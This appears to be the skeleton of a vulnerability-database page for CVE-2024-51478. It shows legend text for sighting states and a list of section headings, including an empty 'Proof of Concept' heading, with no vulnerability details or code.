Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-51478 (GCVE-0-2024-51478)

FKIE_CVE-2024-51478

GHSA-4FVX-H823-38V3

Summary

Details

Proof of Concept (PoC)

Impact

Recommendation

Tags

Sightings

Nomenclature